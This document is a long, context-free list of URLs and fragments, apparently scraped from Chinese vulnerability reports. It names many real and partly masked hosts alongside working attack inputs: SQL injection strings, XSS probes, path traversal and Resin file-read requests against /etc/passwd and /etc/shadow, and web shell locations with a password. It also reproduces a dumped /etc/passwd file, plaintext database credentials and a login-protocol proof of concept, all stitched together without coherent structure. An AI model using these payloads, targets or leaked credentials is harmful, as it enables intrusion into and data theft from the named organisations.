http://www.jubaowu.com.cn/jubaowu/public/auth/login http://issue.wanglibank.com/ http://www.ydma.cn/ http://119.188.72.165/admin/gotologin.box https://github.com/machao23/workHour/blob/e630a027fab0bbb0b7105e192c32d49105653ec2/config.ini http://vp.csii.com.cn/project/ http://mel.xmu.edu.cn:80/comet/absence_inform_file.asp?id=1 http://mel.xmu.edu.cn/meeting/10th_iebs/infosys/admin_login.asp http://**.**.**.**/weblogin.aspx http://**.**.**.**/weblogin.aspx http://**.**.**.**/weblogin.aspx http://**.**.**.**/weblogin.aspx http://**.**.**.**:1500/weblogin.aspx http://**.**.**.**:1600/weblogin.aspx https://www.wooyun.org/bugs/wooyun-2015-0147241,咦,不能开传送门了,那截图好了 511422.wsglw.net/do/Person/Person.do http://www.yafco.com/tools/tools.zip http://infosec.sjtu.edu.cn/UndergraduateDetail.asp?id=270 http://infosec.sjtu.edu.cn/bg/ http://job.nju.edu.cn:9081/login/nju/home-article.jsp?ID=03789669-6e58-11e5-99b3-5db8f6fbcd47&type=xyzp&XH=1 http://job.nju.edu.cn:9081/login/nju/home-article.jsp?ID=03789669-6e58-11e5-99b3-5db8f6fbcd47&type=xyzp&XH=1 http://cp.super8.com.cn/Order/Details?orderNo=31031887 http://cp.super8.com.cn/Order/Details?orderNo=31031864 http://cp.super8.com.cn/Order/Details?orderNo=31032063 http://**.**.**.**/search_index.php http://**.**.**.**/search_index.php http://**.**.**.**/LoginAction.do?method=qrySystemPostByID&news_id=99378ABCF7841BC6E04013AC3C0027DE http://**.**.**.**/LoginAction.do?method=qrySystemPostByID&news_id=99378ABCF7841BC6E04013AC3C0027DE http://woodscience.csuft.edu.cn/hudong/Vote.aspx?id=111 http://10.10.102.102/a/login.asp http://10.10.102.102/a/eWebEditor/admin_login.asp https://www.wooyun.org/bugs/wooyun-2010-0143063 http://115.29.202.192:7001/prlife-jfmall/index.shtml地址打不开了,应该已经修复了 http://115.29.202.192:7002/console/login/LoginForm.jsp http://115.29.202.192:7002/ca/index.jsp http://115.29.202.192:7002/ca/a.jsp http://115.29.202.192:7002/ca/ma3.jsp?o=vLogin http://115.29.202.192:8081/console/login/LoginForm.jsp 
http://**.**.**.**/news_detail.asp?NewsId=6251 http://**.**.**.**/news_detail.asp?NewsId=6251 http://itoms.open.com.cn/Admin/index.aspx http://oa.gaosiedu.com http://oa.gaosiedu.com/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER https://www.wooyun.org/bugs/wooyun-2010-0141651 ftp://58.53.212.29/ https://www.wooyun.org/bugs/wooyun-2010-0143202 https://www.wooyun.org/bugs/wooyun-2010-0142472 https://www.wooyun.org/bugs/wooyun-2010-0142255 http://**.**.**.**/login.aspx,万能密码即可登录,上传文件没有过滤,可直接上传asp大马,进入系统可获取管理员权限。 http://www.9666.cn/passRestore/showPassRestore.action http://sswz.chinapost.gov.cn/login.do http://rxms.ebogame.com/news.php?contentid=2654 B65CAF626516BDEBC3DF19CD8CC25F5B:FG=1 www.91zjd.com http://**.**.**.**/,如图所示: http://**.**.**.**:8012/Login/Login,如图所示: http://**.**.**.**:8012 http://**.**.**.**/submodule/SituationsInfo.aspx?User_Name=gxnngjkj http://**.**.**.**/submodule/SituationsInfo.aspx?User_Name=gxnngjkj http://**.**.**.**/login http://**.**.**.** http://**.**.**.**/login http://**.**.**.**/register http://mail.yisence.com http://www.yingcankeji.com www.yingcankeji.com https://wooyun.org/bugs/wooyun-2015-0153878 http://172.16.4.95/cmsmanage/monitor.php?act=list http://172.16.4.95/cmsmanage/monitor.php?act=list http://**.**.**.**/web/page.php?fp=newsdetail&id=2311 http://**.**.**.**/web/page.php?fp=newsdetail&id=2311 http://www.uqee.com/Jobs/staff/index/info_id/1* http://**.**.**.**/readnews.asp?id=2233 http://**.**.**.**/readnews.asp?id=2233 http://**.**.**.**/more_pic.action?classId=020204&page=2&t= http://wap.hihoku.com/3g/baike.php?id=17244 http://**.**.**.**/tc/product-detail.php?cid=1&id=357 http://**.**.**.**/tc/product-detail.php?cid=1&id=357 http://**.**.**.**/nol/coursesearch/print_table.php?course_id=104%2014800&class=&dpt_code=0000&ser_no=10105&semester=97-2 http://**.**.**.**/nol/coursesearch/print_table.php?course_id=104%2014800&class=&dpt_code=0000&ser_no=10105&semester=97-2 
http://bbs.oneapm.com/utility/convert/index.php https://wooyun.org/searchbug.php http://**.**.**.**/admin/Epaper/ugA_CEpaperView.asp?hidEpaperID=1407 http://**.**.**.**/admin/Epaper/ugA_CEpaperView.asp?hidEpaperID=1407 http://haoweshop.com:9000/script http://haoweshop.com/woooyun.aspx http://app.pcjoy.cn/,我测试的是安卓版 http://**.**.**.**/index_82.aspx?itemid=160 http://**.**.**.**/qhpz/list_41.aspx?lcid=6 http://**.**.**.**/index_80.aspx?itemid=%3CSVG/onload=alert%28%29;%3E http://**.**.**.**/qhpz/list_41.aspx?lcid=%3Csvg/onload=alert%28%29;%3E http://**.**.**.**/editor/ http://**.**.**.**/xxhs.asp?classid=92 http://**.**.**.**/xxhs.asp?classid=92 http://**.**.**.**:8090/db.sql https://www.wooyun.org/bugs/wooyun-2015-0141818 http://www.91zjd.com:80/ www.91zjd.com http://fws.rrs.com/index www.zrcbank.top www.zrcbank.top http://wx.300.cn http://wx.300.cn/help/?act=search&q=1%27%22&serhidde=0 http://wx.300.cn/.svn/entries http://info.passport.cntv.cn/wyznt/wyznt.jsp http://info.passport.cntv.cn/wyznt/wyznt.jsp http://**.**.**.**/cms/upload.jsp http://www.aniworld.tv http://zx.game.xiaomi.com/ http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@datadir http://**.**.**.**:8099//live/down.jsp?file=../../../../../../../../../../../../../../../../etc/passwd http://**.**.**.**:8099//live/down.jsp?file=../../../../../../../../../../../../../../../../etc/hosts https://wooyun.org/bugs/wooyun-2010-0151050 http://rsc.scu.edu.cn/Account/UserLogin.aspx http://www.dingniugu.com/ddeLine.php?stockcode=601111 http://www.dingniugu.com/ddeLine.php?stockcode=601111 https://**.**.**.**/citiccard/cardishop/jsp/index.jsp?sid=ECCHZF1&pid=CS0119&uid=hahahehe http://**.**.**.**:8081/bin/allottellog.do?method=orderlog&eventId=202034 http://**.**.**.**:8081/bin/allottellog.do?method=orderlog&eventId=202033 http://**.**.**.**:8081/bin/allottellog.do?method=orderlog&eventId=202032 http://**.**.**.**:8081/bin/productList.do?ac=proOrder&type=edit&curPage=2 
http://**.**.**.**:8081/bin/allottellog.do?method=orderlog&eventId=202031 http://lidroid.com/article?id=127&root=125 http://home.ttce.cn/userhome/OrderDetail.aspx?orderid=34996 http://www.letoudai.com/users/self/reset_password http://**.**.**.**:8081/Tra/pub/common/getImgPath.do?path=L2pqdHAvVklPUElDL1AyMDE1L0RfNDg0L0RfMzgyLzlFMzA0Qjg3QzZCOUVDQUZFRDJCNEI5OUFFMThCNTQw http://**.**.**.**:8081/Tra/pub/common/getImgPath.do?path= http://125.88.6.164/jenkins/ https://wxtest.csair.com/csair-appstore-client/ url:http://**.**.**.**/wymc-n.php?id=134 http://59.151.27.181/phpspy.php http://59.151.27.163/phpspy.php http://shop.cdev.emaotai.cn/admin/login.aspx?returnUrl=/admin http://oa.daynitom.com/index.asp http://www.enkj.com/jz/casedetails.asp?id=1 http://www.enkj.com/autosite/ajax/CreatePrice.ashx?type=gp&tp= http://www.enkj.com/idcnews/controls/CreateCode.ashx?random= http://www.enkj.com/user/forget-sub.asp http://univ.zte.com.cn/ContentManage/ http://oms.znv.com:80/ http://59.151.27.147:8080/TransData.asmx?WSDL http://www.feiren.com/ http://wiki.wooyun.org/pentest:filepath http://news.qq.com/etc/hosts http://news.qq.com/etc/host.conf http://news.qq.com/etc/sysconfig/network-scripts/ifcfg-eth0 http://**.**.**.** http://**.**.**.**/admin/file.asp http://**.**.**.**/onews.asp?id=2453 http://**.**.**.**/ http://**.**.**.**/bbs/toplist.jsp?Page=1&orders=7 filetype:doc http://**.**.**.**/jsp/portal/ http://**.**.**.**/resource/news/images/CMS14801/77411.jsp http://**.**.**.**/NewsInfo.asp?ID=156 http://219.145.113.158:8000 http://**.**.**.**/zsxx/webedit/admin_login.asp http://hg.airchinacargo.com/ http://www.lvmama.com/lvyou/ www.lvmama.com http://www.daidekuai.com/aboutus.php?id=173 http://**.**.**.**/login http://**.**.**.**/admin/login.aspx www.gssok.com http://**.**.**.**/news_show.php?id=397 http://**.**.**.**/admin/member_list.php?page=13 http://**.**.**.**/admin/index.php http://**.**.**.**/index.jsp http://zt.iciba.com/guess/index.php?module=caici&f=dt&act=exam 
data:q_id=87&from=q_outer&q_answer=0&q_answer=1&q_answer=2 mapi.damai.cn/user/Login.aspx?account=§15510785831§&pwd=123456&source=10099&version=50300 http://e.zznissan.com.cn/这个页面http://e.zznissan.com.cn/dealer-search_3.html http://www.bs.ecnu.edu.cn www.bs.ecnu.edu.cn http://www.emaotai.cn/vshop/productlist.aspx?categoryid=1&keyword=1 http://show.test.yoho.cn/admin/system/adminuser/page/4 http://119.254.81.209/login http://analytics.open.yohobuy.com/.svn/entries http://static.yohobuy.com/.svn/entries http://m1.yohobuy.com/.svn/entries http://123.59.1.112/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://123.59.1.112/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X 
Server:/etc/X11/fs:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin resin:x:501:501::/home/resin:/bin/bash warren:x:502:502::/home/warren:/bin/bash qinhua:x:503:503::/home/qinhua:/bin/bash kavin:x:509:509::/home/kavin:/bin/bash steven:x:510:510::/home/steven:/bin/bash bink:x:511:511::/home/bink:/bin/bash sailing:x:512:512::/home/sailing:/bin/bash cntv:x:0:0::/home/cntv:/bin/bash http://sso.easou.com/ http://sso.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/web.xml http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://120.197.95.198/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://120.197.95.198/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://120.197.95.241/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://sso.easou.com//db/2.6.0.sql http://223.99.226.150/zabbix/ http://cv.eol.cn http://phpadmin.daojia.com:8081 ConnetionURL:jdbc\:mysql\://192.168.120.224\:58885/dbwww58com_comment?connectTimeout=1000&useUnicode=true&characterEncoding=UTF-8&autoReconnect=true DriversClass:com.mysql.jdbc.Driver UserName:comment58user PassWord:plmko8u76yhwsx ConnetionURL:jdbc\:mysql\://10.58.29.2\:3306/58.test.scf?connectTimeout=1000&useUnicode=true&characterEncoding=UTF-8&autoReconnect=true DriversClass:com.mysql.jdbc.Driver UserName:root PassWord:zhangquan http://yunpan.cn/cJ9F9xPKAcr6Z http://teacher.sicnu.edu.cn http://www.qdmixc.com/admini/login.php 
http://a.app.qq.com/o/simple.jsp?pkgname=com.able.wisdomtreeforteacher http://www.jzjt.com/application/configs/application.ini http://lib.henannu.edu.cn/ArticleList.aspx/action=Add&AllCount=1¤tpage=0&guid=d&pagesize= http://lib.henannu.edu.cn/ArticleList.aspx?SectionId=* http://lib.henannu.edu.cn http://lib.henannu.edu.cn http://**.**.**.**/ http://**.**.**.**/etan2010/works_data_detail.php?id=200 http://**.**.**.**/site_item_content_4.php?site_map_item_id=43 http://**.**.**.**/site_item_content_2.php?site_map_item_id=590 http://**.**.**.**/news.php?id=81 http://**.**.**.**/news_detail.php?id=38 http://hanyu.iciba.com/wiki/index.php?edition-compare-1 http://**.**.**.** http://**.**.**.**/search.php http://**.**.**.**/products.php?ms=1 http://**.**.**.**/products_show.php?ms=16&ss=17&ps=14 http://221.8.57.106:7020/console/login/LoginForm.jsp http://ok.sdo.com/admin.zip http://member.360hitao.com/ http://**.**.**.**/bugs/wooyun-2010-0106283 ext:uc_dw就行了。 http://218.1.66.148/seeyon//logs/ctp.log http://218.1.66.148/seeyon/ http://**.**.**.**/admin/Main.aspx http://hos.nenu.edu.cn http://**.**.**.**/news_con.php?pk=9&page=&l http://**.**.**.** www.zowoyoo.com http://www.zowoyoo.cn/about.html http://report.hoolai.com http://www.hisense.com/ids/account/trsadmin11.jsp?cmd=id这就是马儿地址 http://218.17.200.230:8051/console/login/LoginForm.jsp http://fenghuang.damai.cn http://**.**.**.**:8081/ http://jyyy.jx.sgcc.com.cn http://**.**.**.**//login/login.init.do?otherPageName=../../ http://**.**.**.**//login/login.init.do?otherPageName=../../env.properties http://**.**.**.**/webos/images/coursecenter/back/.svn/entries http://**.**.**.**/webos/js/uploadify/.svn/entries http://**.**.**.**/webos/js/uploadify/php/.svn/entries http://**.**.**.**/ http://**.**.**.**/fccms/site/num/ssqkjgg-zt.jsp http://**.**.**.**/fccms/site/num/3dkjgg.jsp http://**.**.**.**/fccms/site/num/3dkjgg.jsp http://**.**.**.** 
http://easy-u.dongfeng-nissan.com.cn/spadmin/gift_excel.php?EndTime=*&GifeType=1&ok=1&SatTime=1 http://easy-u.dongfeng-nissan.com.cn/index.php?mod=appraisal&page=%5c http://easy-u.dongfeng-nissan.com.cn/spadmin/index.php?CarState=*&EndTime=1&SatTime=1 http://easy-u.dongfeng-nissan.com.cn/spadmin/newcar.php?EndTime=*&SatTime=1 http://easy-u.dongfeng-nissan.com.cn/spadmin/newcar_excel.php?EndTime=*&ok=1&SatTime=1 http://easy-u.dongfeng-nissan.com.cn/usedcaradmin/login_action.php http://wooyun.org/bugs/wooyun-2015-0152905 http://wooyun.org/bugs/wooyun-2015-0154242),安全系数已经高了不少,然而,并没有什么卵用,多次尝试后还是进来了。 URL:http://202.96.17.231发现2个弱口令: http://**.**.**.**/ http://**.**.**.**:9005 https://www.sebug.net/vuldb/ssvid-89715 http://219.143.69.53:9090/index.jsp http://**.**.**.**/photosview/lover_map.asp?id=1 http://www.sooker.com/wangxiaos/1-0-0-0-0-0-0-0-0-0-0.html?course_name=e http://**.**.**.**/lq_teach.aspx DBName:NetCMS、QLFDB http://e.huanqiu.com/login.action https://**.**.**.**/hkulprimo/login.action http://k3srm.dahuatech.com:8015/custom/default.aspx http://**.**.**.**/index.php?m=Goods&a=show&suppliers_id=7&id=578 http://**.**.**.**/index.php?m=Goods&a=show&suppliers_id=7&id=578 http://**.**.**.**/bugs/wooyun-2010-0135332 http://**.**.**.**:8080/manage/admin/admin.jsp,可对超管直接进行新增,编辑等操作 http://**.**.**.**/bugs/wooyun-2010-0135332,但此时可以获取管理帐号密码直接登录系统内再getshell http://**.**.**.**:8080/manage/expert/expertinfo.htm http://**.**.**.**:8080/manage/zsk/commontype.html http://**.**.**.**:8080/manage/ywtj/expertactive.html http://**.**.**.**:8080/manage/ywtj/customeractive.jsp http://**.**.**.**:8080/manage/right/expertright.html http://**.**.**.**:8080/manage/right/expertrelation.html http://**.**.**.**:8080/manage/zsk/commoninfo.html http://**.**.**.**:8080/manage/msg/msg.jsp http://*/manage/admin/getAdmin.jsp http://**.**.**.**/ins!searchins.action http://www.ftimes.info/qiche_folder/qiche.php?bigtype=40 http://www.ftimes.info/ftimes/bbs/viewthread.php?tid=165832 
http://www.ftimes.info/xinwen_erji.php?bigtype=1 http://www.ftimes.info/shishang_folder/shishang.php?bigtype=43 http://www.ftimes.info/m/shownews.php?id=69115 http://www.ftimes.info/jingdianlvyou_folder/jingdianlvyou.php?bigtype=23 http://www.ftimes.info/wochi_zhangtu/tiao1.php?id=601 http://hljjmsyt.zznissan.com.cn/map.php?jxs= http://office.mingyi.com.cn/txl/manage/login.aspx cyz.colourlife.com/notify/view?id=11950 http://cyz.colourlife.com/gift?start_time=2015-11-03&end_time=2015-11-13 cyz.colourlife.com/refundOrder?start_time=2015-11-05&end_time=2015-11-03&status= cyz.colourlife.com/record?start_time=2015-11-03&end_time=2015-11-03&type= cyz.colourlife.com/refundOrder?start_time=2015-11-04&end_time=2015-11-04&status= http://cyz.colourlife.com/returnOrder?start_time=2015-11-04&end_time=2015-11-05&status= http://cyz.colourlife.com/electricOrder?start_time=2015-11-04&end_time=2015-11-04&status= cyz.colourlife.com/reserve?start_time=2015-11-04&end_time=2015-11-04 cyz.colourlife.com/payment?start_time=2015-11-03&end_time=2015-11-04&status= http://cyz.colourlife.com/notify/index?start_time=2015-11-04&end_time=2015-11-0&category_id=0 http://**.**.**.**:9096/zsw/ http://club.zznissan.com.cn/shangxi/shipin.php http://**.**.**/search.aspkeyword=%C7%EB%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6&button2=OpiM http://**.**.**.**/search.asp?keyword=%C7%EB%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6&button2=OpiM http://dongfang.cheyipai.com/PContrller/Login/Index http://dongfang.cheyipai.com http://kia.cheyipai.com http://gwc.cheyipai.com/ http://e.cheyipai.com/ http://www.suxinwen.cn/aj_list.php?cid=1&page=1 http://www.suxinwen.cn/list.php?cid=18 http://**.**.**.**来演示 http://**.**.**.**/wapshop/productlist.aspx?sort=1 http://jjlyj.csuft.edu.cn http://www.paybyfinger.com.cn http://www.paybyfinger.com.cn http://**.**.**.**/searchproducts.php?cat=euAn&searchkey= http://**.**.**.**/searchproducts.php?cat=euAn&searchkey= 
http://**.**.**.**/CHN/view/digest_list_type.asp?dTypeId=51%20AND%203*2*1%3d6%20AND%20236%3d236&page=4&TypeName=%C6%F3%D2%B5%C4%EA%BD%F0%D7%A8%CC%E2 http://**.**.**.**/getpwd.asp?DepartNo=001000000000&UserName= http://**.**.**.**/about_policy_d.php?policy_id=542 http://**.**.**.**/cert_details.php?id=46 http://**.**.**.**/cert_details.php?id=46 ttp://**.**.**.**/content/index.php?lang=2&lv1=5 http://**.**.**.**/content/index.php?lang=2&lv1=5 http://**.**.**.**/admin/login http://**.**.**.**/admin/login http://**.**.**.**/data/admin/ver.txt http://**.**.**.**:7001 http://**.**.**.**:7001/UserIDVerifyServlet http://**.**.**.**:7001/UserIDVerifyServlet wxshop.yili.com/wxshop.zip http://uuask.com/index.html http://nbnssb.aisino.com/online/new/show.asp http://**.**.**.**:80/ http://121.14.6.93:8001/login.asp http://www.cetools.cn http://www.cetools.cn/index.php/cetools_admin/index http://dcc.whut.edu.cn/newAction_index.action http://dcc.whut.edu.cn/newAction_index.action http://dcc.whut.edu.cn/webfuck_shell.jsp,Webfuck_2015 http://ahnsfw.aisino.com/ahwsbsdt/WEB-INF/web.xml http://**.**.**.**/s_second.php?id=28 http://**.**.**.** url:http://2014.minmindai.com/Test?content=sqlinject&a=index&button=%E6%9F%A5%E8%AF%A2%E9%97%AE%E9%A2%98&m=Test http://**.**.**.**/ http://**.**.**.**/iwork/publish/showMore?siteId=37 http://**.**.**.**/iwork/publish/list?siteId=37&researchId=178 http://**.**.**.**/nchd/servlet/topicServlet?method=initTopic&status=2 http://zhaopin.cnooc.com.cn/hrss/dorado/smartweb2.RPC.d?__rpc=true http://nc.hbny.com.cn:9090/hrss/dorado/smartweb2.RPC.d?__rpc=true http://59.173.0.46:8070/hrss/dorado/smartweb2.RPC.d?__rpc=true http://218.94.40.6:8080/hrss/dorado/smartweb2.RPC.d?__rpc=true http://career.sdebank.com/hrss/dorado/smartweb2.RPC.d?__rpc=true http://nc.yxgroup.cc/hrss/dorado/smartweb2.RPC.d?__rpc=true http://hrzp.gzs.com.cn:9080/hrss/dorado/smartweb2.RPC.d?__rpc=true http://zhaopin.cnooc.com.cn/hrss/dorado/smartweb2.RPC.d?__rpc=true 
http://zhaopin.cnooc.com.cn/hrss/dorado/smartweb2.RPC.d?__rpc=true http://nc.hbny.com.cn:9090/login.jsp http://nc.hbny.com.cn:9090/hrss/dorado/smartweb2.RPC.d?__rpc=true http://59.173.0.46:8070/hrss/dorado/smartweb2.RPC.d?__rpc=true http://218.94.40.6:8080/hrss/rm/RmMain.jsp?dsName=ncdl http://career.sdebank.com/hrss/rm/RmMain.jsp?dsName=sdns http://nc.yxgroup.cc http://hrzp.gzs.com.cn:9080 http://exmail.qq.com/ https://mail.hundsun.com/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2fmail.hundsun.com%2fowa%2f http://blog.lrts.me/wp-login.php http://36.250.78.77:3000/.svn/entries http://assets.lrts.me/.svn/entries http://d.lrts.me/.svn/entries http://m.lrts.me/.svn/entries http://soft.lrts.me/ http://103.249.52.2/qmhd/manage/index.php http://oa.colourlife.com https://github.com/ofmyice/Asmypro/blob/2990ba063f7262b5c653e0a552bdbf08fb321cbd/cyp/MobileWebApi/MobileWebApi/NLog.config http://hainan.zznissan.com.cn/deal_askprice.php?height=350;width=560&jxs=391&models=250 http://sso.hc360.com/ssologin?ReturnURL=http%3A%2F%2Fhr.hc360.com%2Fhr%2Fturbine%2Ftemplate%2Fresume%2Cmanage_center.html&renew=true这个接口本来有个https的,但是此处的https就没了,抓包发现用户名密码明文传输的: www.452561400@qq.com www.452561400@qq.com http://www.zznissan.com.cn/nissan/buy/Mp4Down.php?id=6 http://www.zznissan.com.cn/nissan/buy/Mp4Down.php?id=6 http://e.zznissan.com.cn/event/20130909/news/artical.php?sortid=2&arcid=19 http://e.zznissan.com.cn/down.php?cid=1 http://e.zznissan.com.cn/down.php?cid=1 http://www.zznissan.com.cn/english/nissan/car.php?series=9 http://**.**.**.**/seeyon/index.jsp http://taotao.pptv.com/撞库 http://e.easou.com/ http://**.**.**.**:8089/ http://**.**.**.**:8089/about/news_articles.asp?id=46 http://58.215.186.226/dashboard.php?sid=6ccc4e115ddb7e58 
http://58.215.186.226/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://**.**.**.**/bugs/wooyun-2010-0154403这个洞的时候,发现了UC浏览器一个和帐号登陆有关的协议UCCloud UCCloud://ext:cs:userlogin:后面的内容先base64 http://**.**.**.**/cgi-bin/xlogin?appid=716027609&pt_3rd_aid=100468196&style=35&s_url=http%3A%2F%2F**.**.**.**&refer_cgi=authorize&which=&response_type=code&client_id=100468196&redirect_uri=http%3A%2F%2F**.**.**.**%2Fcas%2Fthirdparty%2Fauthorize&display=mobile&state=client_id%3D72%26third_party_name%3Dqq%26isbrowser%3D1 ext:close_window在登陆成功后关闭窗口,POC如下: UCCloud://ext:cs:userlogin:bTkwAKNolSRgB8i+UyjkCbWhycXmdENgS3a6BfKJLtuxhmeim7Pcveq2e45P3D70pBfRIk9l/6VnTCYTjZqk48waDfWHGDb1wjBtaYJ2lQfUzGSzRi6pJLUtpIR4GRgP+dulerAm5WzhtlCW/8pbV5weF8+p0ErP3pG+ZF6M89DENfWWEIkX/ssiutyB6YWJa9snIcW6uYplOX3LgkZN7DuWiyx2f68WbrmfEj8IREwcDEedCE9uYlf3NWffJ6FBWA1oLc7BVxBzK+WEIeo3PnKP+Wgk9pPMYG1QVhGQfr47zRmOnfaP8VH6zyC5G7mdBU/YUj5MH6tI2onwJRLa37PyBUAABCYo8lRCPtpsIyHqt8iNpDSAH/Q0yVF+hwwZz2YcMhbpjFCf7UyuBoH5coQkKHC2+U+PqKPiO7bGkbuhw+iNLjnFlbUFG29ebHCa6Kh/GxMZl6iyog== http://wms.gionee.com/invoker/JMXInvokerServlet http://**.**.**.**/newmh/customersc.do?action=searchAgent&abb_id=6&town_id=0&school_name=a&que_type=1&yewu_id=888&_temp=0.7060562921687961 http://**.**.**.**/newmh/customersc.do?action=searchAgent&abb_id=6&town_id=0&school_name=a&que_type=1&yewu_id=888&_temp=0.7060562921687961 http://**.**.**.**/bugs/wooyun-2015-0135621。后台目测也没做处理。 http://www.mydrivers.com主站登录位置,有验证码限制 http://XX.XX.XX.XX/portal/help/wcmhelp_addedit_dowith.jsp链接未对外部实体进行过滤,可调用外部实体进行解析,可任意读取服务器上任意文件 http://**.**.**.**//FCKeditor/editor/filemanager/connectors/test.html 
http://www.deduold.ecnu.edu.cn/show.aspx?info_id=2149&info_lb=98&flag=98 http://produotion.originseed.com.cn:9080 http://**.**.**.**:80/my/ajax_my.php?action=activeload&type=pagemark&uid=300&vwid=1&pmid=2 http://**.**.**.**/edit/xsdj/meacx.asp?strid=2 http://**.**.**.**/kjxy/show.asp?id=172 http://**.**.**.**/Report/Gensituation.aspx?tableID=4 http://**.**.**.**/dzg/ShowClass.asp?ClassID=14 http://**.**.**.**/lzjs/ShowClass.asp?ClassID=8 http://**.**.**.**/page.asp?pid=1 http://**.**.**.**/teacher.asp?id=19 http://**.**.**.**/xy/xydetail.asp?sid=4651 http://**.**.**.**/edit/xsdj/meacxx.asp?strid=32 http://**.**.**.**/edit/xsdj/meacxx_by.asp?strid=128 http://**.**.**.**/edit/xsdj/meacx_by.asp?strid=13 http://**.**.**.**/ http://**.**.**.**/ http://222.209.200.74:8000/Login.aspx http://hqht.ouc.edu.cn http://**.**.**.**:8083/ http://**.**.**.**:8083/about/news_articles.asp?id=55 http://**.**.**.**:8086/ http://**.**.**.**:8086/about/news_articles.asp?id=52 URL:http://**.**.**.**/FE/login.action http://www.hnrczpw.com/gposinfo/freejobs/searchcls/inducls.asp?id=120100 http://**.**.**.**/ http://**.**.**.**/about/news_articles.asp?id=46 http://**.**.**.**/xlrz/result1.jsp http://**.**.**.**:7007/cpadmin/ http://**.**.**.**该网站主要运行微信服务平台,众多企业公众微信号(江苏银联,江苏电信等)在其平台运营,并且公司还运行微商城等众多微信服务应用,里面有许多用户私密数据。由于缺乏安全防范意识存在严重安全漏洞,暴露用户信息,并可拿到网站shell。危险极大。 http://**.**.**.**:8082/about/news_articles.asp?id=46 http://**.**.**.**:8084/about/news_articles.asp?id=46 http://**.**.**.**/index.php?m=Goods&a=index&cate_id=43 http://**.**.**.**/index.php?m=Goods&a=show&suppliers_id=90&id=1595 http://**.**.**.**:8089/holidays/hotel_detail.asp?route=mfm&seq=2 http://www.ikang.com/ http://crm.demo.5kcrm.com/index.php?m=customer&a=view&id=596&content= https://**.**.**.**/xs0104/web-mvcm/blob/e63f77a47cea52ad17434b95bef3c0f1de666c98/member/resources/mail.properties http://**.**.**.**/CTManager/login.do?lel=0&code=pokmbnnfekinjpfmkliinkpiapknbmch http://**.**.**.**/ 
http://**.**.**.**/system/user/login.do biolab.ecnu.edu.cn/resources/roomres/hydetail.asp?hy1_id=19&hy_name=%CA%B5%D1%E9B%C2%A5511%BB%E1%D2%E9%CA%D2 http://**.**.**.**/bjcgmap/bjcgmapService/ www.colourlife.com http://www.0471-360.com/khal2.php?infoId=47 http://www.0471-360.com/admin/login.php http://**.**.**.**/include/web_content.php?id=727 http://e.zznissan.com.cn/ajax_jxs_point.php?jxs=%E6%AD%A6%E6%B1%89&province=824&city=&address= http://api.3g.huanqiu.com/cms/index.php?r=api4/index&a=getArticleListByChannelId&type=3&id=165&limit=3 http://teacher.gongfubb.com http://**.**.**.**/news_show.php?id=151 http://oa.bjgold.com.cn/Administrator.txt http://**.**.**.**/article.asp?id=12 http://**.**.**.**/admin/index.asp http://wap.hihoku.com/wap/viewimg.php?aid=326738 http://**.**.**.**:7001/hzgjjweb/ http://ec.shaangu-group.com:7001/logonAction.do http://www.easy-linkholiday.com/gbhotel/rssfeed.asp?id=15196” http://filmtest.spider.com.cn/tickdating.html?order=hotdating&type=zfLIo4 http://bbs.3d.ztgame.com/uc_server/ http://bbs.3d.ztgame.com/uc_server/cs.php 